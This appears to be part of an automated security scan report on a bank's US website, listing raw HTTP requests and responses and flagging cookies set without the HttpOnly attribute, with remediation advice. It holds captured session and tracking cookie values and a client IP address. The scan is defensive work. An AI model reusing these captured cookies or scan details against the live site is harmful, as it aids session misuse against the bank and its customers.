GET /1/2/3/hsbcpremier/family HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:31 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:31 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000v7MuEaFINUuqRFacMD3jRmm:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:31 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34116
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
GET /1/2/3/hsbcpremier/international HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:17 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:17 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000zaHLMq9hdAup3Wxlb5hlayz:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:17 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 31935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
GET /1/2/3/hsbcpremier/investment HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:22 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:22 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=00000rTGspoTiHDkPL7HoIVIl8O:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:22 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 42944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
GET /1/2/3/hsbcpremier/privileges HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:22 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:22 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=00008GkbMN-lq2sC8h0WvXE42vp:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:22 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 40792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
GET /1/2/3/hsbcpremier/products HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:32 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:32 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000tSiEP2UjzzszGvKqkH6oDv8:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:32 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 37906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
GET /1/2/3/hsbcpremier/products/checking HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:34 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:34 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000K5e19lxsL9rl6HyPKYS1Vtw:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:33 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 36108
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
GET /1/2/3/hsbcpremier/products/loans HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:43 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:43 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000zLBu5-ZGn_ZPmzij6nPWjLd:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:43 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 37892
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
GET /1/2/3/hsbcpremier/products/savings HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:41 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:42 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000VG7g5uCinhKHPYLoC3m6Y-A:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:42 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:09:01 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/!ut/p/c1/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gDd-NQv1BDg2AXA3cP_2AX42AfAwgAykeC5MOC_LycPfxcDRwNg80tTI0NYPL4dft55Oem6hfkRpQDAP9OMQY!/dl2/d1/L2dJQSEvUUt3QS9ZQnB3LzZfMEczVU5VMTBTRDBHSE9TREMxNzAwMDAwMDA!/ HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:01 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:01 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000boERHQpk_HzT5bY6Nf9E033:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:09:01 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 28622
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/2/3 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:59 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:59 GMT Vary: User-Agent,Cookie Content-Length: 6290 Set-Cookie: USIB2G=0000yMfOGXPm0EZKfyzD-vc95VY:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:35 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/business HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:36 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:36 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000IHKyqDBuyTq8nX3u5YaWZk6:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:35 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 45251
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/2/3/contact-us HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:47 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:47 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000KxsP67T1EzncR8Q9s-Hu6WR:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 47073
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/2/3/hsbcadvance HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:38 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:38 GMT Vary: User-Agent,Cookie Content-Length: 5479 Set-Cookie: USIB2G=0000wE97Wcuq7GFJTd9gZl2cVK4:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 16:26:46 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier HTTP/1.1 Host: www.us.hsbc.com Proxy-Connection: keep-alive Referer: http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq; HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; www.us.hsbc.com-VH=63510956.20992.0000; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770438495:ss=1296770438495
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:26:46 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 16:27:46 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=00009j9oS1DsSmvGsL9vbUKJ919:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 16:26:46 GMT; Path=/ S: hbus-vh502_1 Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 48767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:32 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/apply HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:32 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:32 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000nfoRvce7Dt5JQT9tlRfz8Nd:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:32 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 33927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:31 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/family HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:31 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:31 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000v7MuEaFINUuqRFacMD3jRmm:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:31 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34116
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:17 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/international HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
